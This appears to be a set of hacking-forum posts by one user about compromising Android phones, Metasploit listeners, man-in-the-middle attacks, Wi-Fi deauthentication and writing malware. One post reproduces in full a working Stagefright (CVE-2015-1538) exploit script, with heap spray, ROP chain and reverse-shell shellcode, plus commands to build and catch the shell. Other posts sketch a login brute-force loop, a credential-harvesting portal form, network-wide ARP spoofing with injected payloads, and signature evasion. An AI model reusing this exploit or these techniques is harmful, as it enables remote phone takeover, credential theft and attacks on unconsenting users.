vailixi

0o0michael0o0, I tried creating an apk and installing it. I can put it on my apache web server for download. I can pass the thing through Google drive. I can install it on Android if change security settings to allow applications other than Google play. Then the thing installs just fine. I had problems with the multi/handler because it wanted to start on a default port. I generated the payload on the default port. 24000something. I can't remember the port number. That wasn't a big deal. The default listener didn't get a connection back from meterpreter. I tried just killing the process associated with the listener but it killed the rpc daemon. I set what I thought were the appropriate options LPORT to something like 8888 or other generic port but it keeps wanting to connect on the port the rpc daemon is running on which is really annoying. What am I doing wrong there? Is there a way to configure metasploit to start the default listener on a specific port?

So you will know what a false result looks by intercepting the server response with wireshark? So if you get a response other than a failed one it might be a successful login? If it were something like a website where you could create an account you would be able to successfully login and collect the positive login response. So something like: Sorry for shitty pseudo code here. for line in (wordlist.txt); do wget --user=admin --password=line <url> checkfiles() if login !=fail break; print user & password; done Am I close here?

I was never really sure about brute forcing web logins and what information I was actually looking for.

So this Microsoft Linux project does it have an official page?

You're right on that, Microsoft isn't going anywhere anytime soon. And to tell the truth Microsoft has been contributing to the Linux code base for quite some time. So it doesn't surprise me they are putting out their own Linux. They used to have a Unix clone called Zenix back in the day. I used to use that at work. I think Windows NT 4.0 was probably about my favorite Windows. It didn't crash a lot. You could get work done. The little thing didn't come on and just roll and roll like it was waiting for the insects to take over the earth while it was installing updates.

With the decline of Windows this is going to make sense for Microsoft.

I hadn't thought of this. There are a bunch of stagefright vulnerability detector apps out there. I'm pretty sure all it does is loop through the memory addresses and tries to run a bit of code until it is successful. So finding source for stagefright vuln detector would be a big help. You could modify it then run in it on your phone to find the memrory location then craft a vuln for that phone easy squeezy. That's probably what the app developers are doing if they are smart. Anyhow then you create a bunch of specific exploits for each model of phone and android version. But you would still have to know the model of the phone you were trying to shell. Anyhow have any of you seen some source code for a stagefright vuln detector?

How does one find the memory location or address space of a program or library? What is egg hunting? So if you are looking for an exploitable bug do you pretty much brute force the memory with some code we want to run?Somebody explained this to me a while back but I only partially understood what was going on. So if there's some buggy code like a character array and it is a certain size like 50 so anything 51+ is written to another memory space. How do I find that array in memory and write to it?

It pretty much seems like any android device is down to get three holed.

I've never hacked a phone before but with all the buzz about Android lately I figure I should at least try it out. I was looking through available metasploit payloads and there are some shells and meterpreters already available but not really a whole lot of encoding options for ARM based payloads. As far as signatures for go I think I could pretty much change up all of the names of variables and functions names within a given program to random strings. Like pipe them through openssl or truncate the output and use the truncated hash random(random(hash)) and it would come out different for signature. Different checksums and whatnot. I don't have an ARM based computer. Well I ordered an Orange pi plus few days ago. I was going to use it as a file server or run an NES emulator on it. So question: Is there an automated way to create an obfuscated ARM payload and. Do I have to compile it on an ARM processor or can I compile ARM on my core i7. Any I'm thinking if I have the ARM binary I can just objdump it to the desired architecture and use the ASM right? Am I getting ahead of myself here? Who hacks themselves some droids?

Trying out some of these. bettercap seems to be working just fine. Where does the -X option write the captured data to?

I had this prettty nifty tool called Suberfuge a while back. It has a pretty nifty web interface and a cool code injection module that you can use metsploit. The problem is it doesn't seem to work anymore. There were some tools like hamster, ferret, ettercap, and firesheep that did this a while back. I'm not sure if any of those are really working. I tried messing around with ettercap but I got a lot of errors. Not sure if I have etter.conf correct. Anybody still using ettercap? I know there had been some improvements to SSL that rendered SSL strips non-functional. Then SSL split came about as a replacement. I'm not really sure how a lot of newer MITM stuff works. I'm also not really up on the technical aspect of ip forwarding and whatnot. But I'm serious about learning it. Anybody want to talk me point me in the way of some still working tutorials or talk through some attacks? What I'm curious about: Capturing credentials spoofing DNS and directing people to websites to harvest credentials Spoofing so the target machine thinks my payload is an update or something else trusted. Any of you guys doing this on the regular these days?

Mostly I'm working on concepts. There seems to be a lot of code examples in Java for doing what I want to do. If I can find some examples in C that do what I need to do then that's great. Any good references for programming malware? Say you wanted to install a proxy server or on the target or maybe a portable virtual machine with an entire operating system that you can control via SSH and scripting or message passing interface. An applet is an easy way to do that. If you were going to Pentest a large network like a business campus or a college and you wanted access to a lot of machines and to make a statement about security posture or awareness you could just arp spoof the entire network and inject an applet into pages the users download. Download the a new desktop background. Schedule the web browser to pull up a youtube video. I'm thinking Warrant's Cherry Pie is good selection for a prank like this. Or an educational video about whatever aspect of security the user was not minding. Not really looking to meterpreter or VNC computers and snoop around. Of course that would be option.

Does this option run a single deauthentication? Or does it do it contiunuously creating a denial of service? mdk3 wlan1 d Or can you set the number of deauth requests like you can with aireplay-ng?

Just for a minute. There's a terminal I'm not familiar with at all.

This is a pretty sweet script. I've thought about doing something like this but I really didn't know how to go about it. This is right there with wifite for easy mode. It would be cool if there was a script for automatically detecting associated wireless clients and deauthenticating them for handshakes. Then a guy could go full beast mode and just destroy the wifis. I'm not sure how to get outputs from programs like reaver and use them as variables. Anybody want to talk about this? Actually you could just put something like this into the script where the reaver wps attack fails. Open3.popen3(wifite -b #{ap_mac}) This just looks right but I don't know ruby.

Probably highly illegal unless you live in Serbia. I think with software defined radio and dect it could be done. I hear cell phone encryption takes a lot of compute power to crack. I think the reason law enforcement or ABC company is able to monitor cell phone communications is because they can easily obtain the encryption keys from the the cellular carriers. Most telephone traffic is encrypted these days. Also I'm pretty sure cell carriers just straight up monitor your transmissions these days anyhow. An attacker would probably be more likely to succeed at exploiting the phone and recording transmissions that way.

remmina works well on Kali 2.0 apt-get install remmina input ip:port to the text field select protocol and hit connect you're prompted for a password Then you're in. Too easy.

Maybe something like this: <html> <body> <form name="form" method="post"> <input type="text" name="text_box" size="63"/> <input type="submit" id="search-submit" value="submit" /> </form> </body> </html> <?php if(isset($_POST['text_box'])) { $a = $_POST['text_box']; $myFile = "t.txt"; $fh = fopen($myFile, 'w') or die("cannot open file"); fwrite($fh, $a); fclose($fh); } ?> You could always store the passwords in a mysql database. Also I'm pretty sure there are many captive portal scripts you could use or mod.

Haven't tried that yet. You gotta love one liners. I think the shortest way I'd previously seen for doing this was about 7 lines.

I'm trying to download schedule and run a program on the target machine without any special privileges. It seems work ok on Windows. For Linux this can all work if the machine is already running as root. It's more complicated. I'm trying to use tools that are likely to installed installed the target machine and can usually be ran without administrative privileges. Shortly 3 billion machines run Java so it's a fairly safe bet the code will run, networking with Java is stuff that I can understand. I tried writing some networking in C and C++ but I always ran into issues with getting libraries and frameworks to work. There are a lot of code examples for curl or ACE but none them seem to work when I try to compile them. I'm not sure where to put the libs on my machine when I install. And it kinda sucks when I'm trying to learn a framework or language and none of the code examples have valid syntax and you don't really know the language or framework well enough to troubleshoot it. This is why I never learned C#. Every book I looked in had code example for what seemed like useful programs but when I tried it out nothing worked. I also have never taken a single computer related course with the exception of keyboarding back in the day. I taught myself everything from videos, pdf, searches, and forums. So I think of and end goal and I think up the pieces that will make it work. Then I look the stuff up on Google. I don't so much care what I have to do to make it work so long as the original objective is accomplished. Also wanted to comment that Hak5 is probably the most supportive online community I've been involved with. Thanks everybody for being awesome! Still trying to figure out how to create a startup process without administrative privileges. Anybody know how to do that. I saw a batch file that will create a start folder icon. But it needs to be run as admin.

Correction I renamed the script to mp4.py and was able to build the MP4 by running ./mp4.py -c 192.168.0.184 -p 1999 -o donkeypunch The payload is a modified linux/armle/shell_reverse_tcp according comments in the script. maybe open netcat with something like this nc -l -p 1999 Then send the message to the target phone. Maybe shell. Or not I think there are some other issues going on here. But I suck at hacking. I think the default memory address is associated with the hangouts app in this script. I could be wrong though. I'm wrong a lot. Let's see what someone a little smarter has to say about it.

I'm not really a Python or Android guy. But I was reading about this yesterday. Here's a script that you can make the MP4 file. There are some options toward the end of the code. I made them red. I'm not even sure what -r and -s are. Anyway when I run this thing I get an error no module named mp4. So I'm guessing I don't have that library installed. Anyhow truth be told. I can't remember where I got this script from. I'm sure there will be a metasploit module for this pretty soon. -c I think is the same as LHOST -p LPORT -o is the name of the output file So I'm thinking you just start a listener then launch send the multimedia in a message and it connects back. #!/usr/bin/env python # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs # Shout outs to our friends at Optiv (formerly Accuvant Labs) # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 # www.zimperium.com # # Exploit for RCE Vulnerability CVE-2015-1538 #1 # Integer Overflow in the libstagefright MP4 'stsc' atom handling # # Don't forget, the output of "create_mp4" can be delivered many ways! # MMS is the most dangerous attack vector, but not the only one... # # DISCLAIMER: This exploit is for testing and educational purposes only. Any # other usage for this code is not allowed. Use at your own risk. # # "With great power comes great responsibility." - Uncle Ben # import struct import socket # # Creates a single MP4 atom - LEN, TAG, DATA # def make_chunk(tag, data): if len(tag) != 4: raise 'Yo! They call it "FourCC" for a reason.' ret = struct.pack('>L', len(data) + 8) ret += tag ret += data return ret # # Make an 'stco' atom - Sample Table Chunk Offets # def make_stco(extra=''): ret = struct.pack('>L', 0) # version ret += struct.pack('>L', 0) # mNumChunkOffsets return make_chunk('stco', ret+extra) # # Make an 'stsz' atom - Sample Table Size # def make_stsz(extra=''): ret = struct.pack('>L', 0) # version ret += struct.pack('>L', 0) # mDefaultSampleSize ret += struct.pack('>L', 0) # mNumSampleSizes return make_chunk('stsz', ret+extra) # # Make an 'stts' atom - Sample Table Time-to-Sample # def make_stts(): ret = struct.pack('>L', 0) # version ret += struct.pack('>L', 0) # mTimeToSampleCount return make_chunk('stts', ret) # # This creates a single Sample Table Sample-to-Chunk entry # def make_stsc_entry(start, per, desc): ret = '' ret += struct.pack('>L', start + 1) ret += struct.pack('>L', per) ret += struct.pack('>L', desc) return ret # # Make an 'stsc' chunk - Sample Table Sample-to-Chunk # # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and # cause a heap overflow. # def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False): ret = struct.pack('>L', 0) # version/flags # this is the clean version... if not do_overflow: ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets ret += 'Z' * (12 * num_alloc) return make_chunk('stsc', ret) # now the explicit version. (trigger the bug) ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets # fill in the entries that will overflow the buffer for x in range(0, num_write): ret += make_stsc_entry(sp_addr, sp_addr, sp_addr) ret = make_chunk('stsc', ret) # patch the data_size ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:] return ret # # Build the ROP chain # # ROP pivot by Georg Wicherski! Thanks! # """ (gdb) x/10i __dl_restore_core_regs 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5} 0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5} 0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11} 0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc} """ """ b0001144 <__dl_mprotect>: b0001144: e92d0090 push {r4, r7} b0001148: e3a0707d mov r7, #125 ; 0x7d b000114c: ef000000 svc 0x00000000 b0001150: e8bd0090 pop {r4, r7} b0001154: e1b00000 movs r0, r0 b0001158: 512fff1e bxpl lr b000115c: ea0015cc b b0006894 <__dl_raise+0x10> """ def build_rop(off, sp_addr, newpc_val, cb_host, cb_port): rop = '' rop += struct.pack('<L', sp_addr + off + 0x10) # new sp rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc} rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc} rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned) rop += struct.pack('<L', 0x1000) # new r1 - length rop += struct.pack('<L', 7) # new r2 - protection rop += struct.pack('<L', 0xd000d003) # new r3 - scratch rop += struct.pack('<L', 0xd000d004) # new r4 - scratch rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect native_start = sp_addr + 0x80 rop += struct.pack('<L', native_start) # address of native payload #rop += struct.pack('<L', 0xfeedfed5) # top of stack... # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit) buf = '' # fork buf += '\x02\x70\xa0\xe3' buf += '\x00\x00\x00\xef' # continue if not parent... buf += '\x00\x00\x50\xe3' buf += '\x02\x00\x00\x0a' # exit parent buf += '\x00\x00\xa0\xe3' buf += '\x01\x70\xa0\xe3' buf += '\x00\x00\x00\xef' # setsid in child buf += '\x42\x70\xa0\xe3' buf += '\x00\x00\x00\xef' # socket/connect/dup2/dup2/dup2 buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c' buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60' buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0' buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1' buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06' buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00' buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0' buf += '\xe3\x00\x00\x00\xef' # execve(shell, argv, env) buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0' buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d' buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00' buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00' buf += '\xef\x02\x00' # Add the connect back host/port buf += struct.pack('!H', cb_port) cb_host = socket.inet_aton(cb_host) buf += struct.pack('=4s', cb_host) # shell - buf += '/system/bin/sh\x00\x00' # argv - buf += 'sh\x00\x00' # env - buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00' # Add some identifiable stuff, just in case something goes awry... rop_start_off = 0x34 x = rop_start_off + len(rop) while len(rop) < 0x80 - rop_start_off: rop += struct.pack('<L', 0xf0f00000+x) x += 4 # Add the native payload... rop += buf return rop # # Build an mp4 that exploits CVE-2015-1538 #1 # # We mimic meow.3gp here... # def create_mp4(sp_addr, newpc_val, cb_host, cb_port): chunks = [] # Build the MP4 header... ftyp = 'mp42' ftyp += struct.pack('>L', 0) ftyp += 'mp42' ftyp += 'isom' chunks.append(make_chunk('ftyp', ftyp)) # Note, this causes a few allocations... moov_data = '' moov_data += make_chunk('mvhd', struct.pack('>LL', 0, 0x41414141) + ('B' * 0x5c) ) # Add a minimal, verified trak to satisfy mLastTrack being set moov_data += make_chunk('trak', make_chunk('stbl', make_stsc(0x28, 0x28) + make_stco() + make_stsz() + make_stts() )) # Spray the heap using a large tx3g chunk (can contain binary data!) """ 0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs 0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0 0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1 0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4 0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement 0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1 0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42> 0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase 0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr 0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address 0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6 0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it! """ page = '' off = 0 # the offset to the next object off += 8 page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource) page += struct.pack('<L', sp_addr + off) # mRefs off += 16 page += struct.pack('<L', 1) # mStrong page += struct.pack('<L', 0xc0dedbad) # mWeak page += struct.pack('<L', sp_addr + off) # mBase page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK) off += 8 page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused) off += 16 page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0 page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4 page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8 page += struct.pack('<L', newpc_val) # vtable entry 12 rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port) x = len(page) while len(page) < 4096: page += struct.pack('<L', 0xf0f00000+x) x += 4 off = 0x34 page = page[:off] + rop + page[off+len(rop):] spray = page * (((2*1024*1024) / len(page)) - 20) moov_data += make_chunk('tx3g', spray) block = 'A' * 0x1c bigger = 'B' * 0x40 udta = make_chunk('udta', make_chunk('meta', struct.pack('>L', 0) + make_chunk('ilst', make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) + make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) + make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) + make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 + make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) + make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) + make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) + make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) + make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) + make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) + make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) + make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 + make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) + make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) + make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger))) ) ) moov_data += udta # Make the nasty trak tkhd1 = ''.join([ '\x00', # version 'D' * 3, # padding 'E' * (5*4), # {c,m}time, id, ??, duration 'F' * 0x10, # ?? struct.pack('>LLLLLL', 0x10000, # a00 0, # a01 0, # dx 0, # a10 0x10000, # a11 0), # dy 'G' * 0x14 ]) trak1 = '' trak1 += make_chunk('tkhd', tkhd1) mdhd1 = ''.join([ '\x00', # version 'D' * 0x17, # padding ]) mdia1 = '' mdia1 += make_chunk('mdhd', mdhd1) mdia1 += make_chunk('hdlr', 'F' * 0x3a) dinf1 = '' dinf1 += make_chunk('dref', 'H' * 0x14) minf1 = '' minf1 += make_chunk('smhd', 'G' * 0x08) minf1 += make_chunk('dinf', dinf1) # Build the nasty sample table to trigger the vulnerability here. stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER # Add the stbl to the minf chunk minf1 += make_chunk('stbl', stbl1) # Add the minf to the mdia chunk mdia1 += make_chunk('minf', minf1) # Add the mdia to the track trak1 += make_chunk('mdia', mdia1) # Add the nasty track to the moov data moov_data += make_chunk('trak', trak1) # Finalize the moov chunk moov = make_chunk('moov', moov_data) chunks.append(moov) # Combine outer chunks together and voila. data = ''.join(chunks) return data if __name__ == '__main__': import sys import mp4 import argparse def write_file(path, content): with open(path, 'wb') as f: f.write(content) def addr(sval): if sval.startswith('0x'): return int(sval, 16) return int(sval) # The address of a fake StrongPointer object (sprayed) sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts) # The address to of our ROP pivot newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs # Allow the user to override parameters parser = argparse.ArgumentParser() parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7') parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345) parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None) parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None) parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4') args = parser.parse_args() if len(sys.argv) == 1: parser.print_help() sys.exit(-1) if args.spray_addr == None: args.spray_addr = sp_addr if args.rop_pivot == None: args.rop_pivot = newpc_val # Build the MP4 file... data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport) print('[*] Saving crafted MP4 to %s ...' % args.output_file) write_file(args.output_file, data)

I've chained VNC sessions pretty much just using the end machine to do stuff.(of course you could use a proxy between each machine and between the end machine and whatever you are doing) You could probably chain SSH or telnet in a stable manner and use a lot of machines. But I've honestly never been able to use a proxy without having severe slowdowns. This gives me a pretty sick idea for using SSH and some scripting in a creative way. I'm going to have to mess around with some virtual machines. I haven't arrived at a great understanding of how networking actually works. But pretty much my thoughts are if you're using a proxy, you're putting another connection between you and the end point of your communication. If there's to many points that are to far apart the connection will time out. Also it depends on what protocols you are using. Are you downloading a file and you have to check each part of the transmission and retransmit lost packets or are you streaming video or message passing where it's more of best effort protocol.

That's like one of those obscure movie easter eggs that most people would not even notice.